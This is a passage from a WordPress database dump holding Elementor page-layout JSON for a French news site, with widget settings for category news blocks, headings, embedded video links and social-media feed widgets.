_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1497,507,'_elementor_version','0.4'),(1498,507,'_elementor_css','a:3:{s:4:\"time\";i:1508927351;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1503,509,'_elementor_edit_mode','builder'),(1504,509,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ngknvkp\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8508cfh\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"primary-sidebar\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"34\",\"isLinked\":false},\"_background_background\":\"gradient\"},\"elements\":[],\"widgetType\":\"sidebar\"},{\"id\":\"lxbvyap\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[custom-facebook-feed]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1505,509,'_elementor_version','0.4'),(1507,510,'_elementor_edit_mode','builder'),(1508,510,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ngknvkp\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"lxbvyap\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[custom-facebook-feed]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1509,510,'_elementor_version','0.4'),(1510,510,'_elementor_css','a:3:{s:4:\"time\";i:1508928067;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1513,511,'_elementor_edit_mode','builder'),(1514,511,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tab